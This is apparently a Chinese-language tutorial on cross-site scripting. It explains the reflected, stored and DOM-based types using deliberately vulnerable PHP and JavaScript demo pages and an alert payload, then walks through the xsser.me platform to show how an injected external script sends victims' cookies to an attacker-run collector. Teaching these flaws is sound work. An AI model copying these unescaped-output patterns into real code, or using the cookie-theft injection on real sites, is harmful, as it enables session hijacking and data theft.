44. XSS篇——XSS原理+分类+用途

什么是XSS

XSS（Cross Site Script）,跨站脚本攻击。它是指恶意攻击者在web页面当中插入恶意的html代码，当用户浏览该页面时，嵌入其中Web页面里面的HTML代码就会执行，从而达到恶意用户的特殊目的。

XSS分类

XSS攻击可以分为两大类：

非持久性XSS攻击：顾名思义，非持久性XSS攻击是一次性的，仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接，用户访问该链接时，被植入的攻击脚本被用户游览器执行，从而达到攻击目的。

持久型XSS攻击：持久型xss，会把攻击者的数据存储在服务器端，攻击行为将伴随着攻击数据一直存在。

其实XSS也可以分为三类：

反射型：经过后端，不经过数据库。

存储型：经过后端，经过数据库。

DOM型：不经过后端，DOM-based XSS 漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的。

XSS原理

1.反射型

新建一个xss.php文件并加入以下代码:

\\XSS反射演示
<form action="" method="get">
    <input type="text" name="xss"/>
    <input type="submit" value="test"/>
</form>
<?php
$xss = @$_GET['xss'];
if($xss!==null){
    echo $xss;
}

这段代码中首先包含一个表单，用于向页面自己发送 GET 请求，带一个名为xss的参数。 然后 PHP 会读取该参数，如果不为空，则直接打印出来，这里不存在任何过滤。也就是说，如果xss中存在 HTML 结构性的内容，打印之后会直接解释为 HTML 元素。

部署好这个文件，访问http://localhost/xss.php，直接输入一个js代码，比如<script>alert('hack')</script>

之后点击test：

我们输入的HTML代码被执行了。用Firebug查看，我们输出的内容直接插入到了页面中，解释为<script>标签。

反射型 XSS 的数据流向是：浏览器 -> 后端 -> 浏览器。

2.存储型

把xss.php内容改为（同时数据库中需要配置相应的表）：

\\存储XSS演示
<form action="" method="post">
    <input type="text" name="xss"/>
    <input type="submit" value="test"/>
</form>
<?php
$xss=@$_POST['xss'];
mysql_connect("localhost","root","123");
mysql_select_db("xss");
if($xss!==null){
    $sql="insert into temp(id,payload) values('1','$xss')";
    $result=mysql_query($sql);
    echo $result;
}  ?>

用户输入的内容还是没有过滤，但是不直接显示在页面中，而是插入到了数据库。

新建show.php，内容为：

mysql_connect("localhost","root","root");
mysql_select_db("xss");
$sql="select payload from temp where id=1";
$result=mysql_query($sql);
while($row=mysql_fetch_array($result)){
    echo $row['payload'];  }

该代码从数据库读取了之前插入的内容，并将其显示出来。先创建一个数据库xss,创建temp表

然后访问xss.php，像之前一样输入 HTML 代码

点击test，点击之后却发现没有任何动静，但事实上，我们的数据已经插入到了数据库中。

当我们访问show.php查询这个值的时候，代码就会被执行。

存储型 XSS 的执行位置通常不同于输入位置。

存储行 XSS 的数据流向是：浏览器-> 后端-> 数据库-> 后端-> 浏览器。

3.dom-xss

把xss.php内容改为

<?php
error_reporting(0); //禁用错误报告
$name = $_GET["name"];
?>
<input id="text" type="text" value="<?php echo $name;?>" />
<div id="print"></div>
<script type="text/javascript">
var text = document.getElementById("text"); 
var print = document.getElementById("print");
print.innerHTML = text.value; // 获取 text的值，并且输出在print内。这里是导致xss的主要原因。
</script>

DOM-XSS 的数据流向是：URL-->浏览器 

总结:     在易用上，存储型XSS > DOM - XSS > 反射型 XSS。

注：反射型xss和dom-xss都需要在url加入js代码才能够触发。

利用

通过 XSS 来获得用户 Cookie 或其他有用信息，利用平台负责接收并保存这些信息。

XSS利用平台有很多种如XSS Shell, BeEF, Anehta, CAL9000。这里使用xsser.me、搭建过程可参考这:http://blog.csdn.net/u011781521/article/details/53895363进入搭建好的xsser.me平台首页输入用户名与密码进行登录

成功之后会显示主界面，左边是模块列表，右边是项目列表： 

我们点击左边“我的项目”旁边的“创建”按钮：

名称和描述可以随便取，不影响使用。输入时候点击“下一步”按钮。之后会出现“配置代码”界面：

点击下一步、就会看到这个项目的一些信息

点击完成。然后我们会在首页看到我们的新项目，点击这个项目：

之后点击项目，进入一个页面再点击右上方的查看代码

就可以看到使用方法：

下面就演示下怎么利用

把<scriptsrc="..."></script>注入到反射型 XSS 的演示页面中。

上面的src="xxxx"是我另外创建的一个项目的地址，把你创建好的那个项目，提供的那个地址放进去，就可以了，虽然这个页面没反应，但是xsser.me那个项目就收到消息了。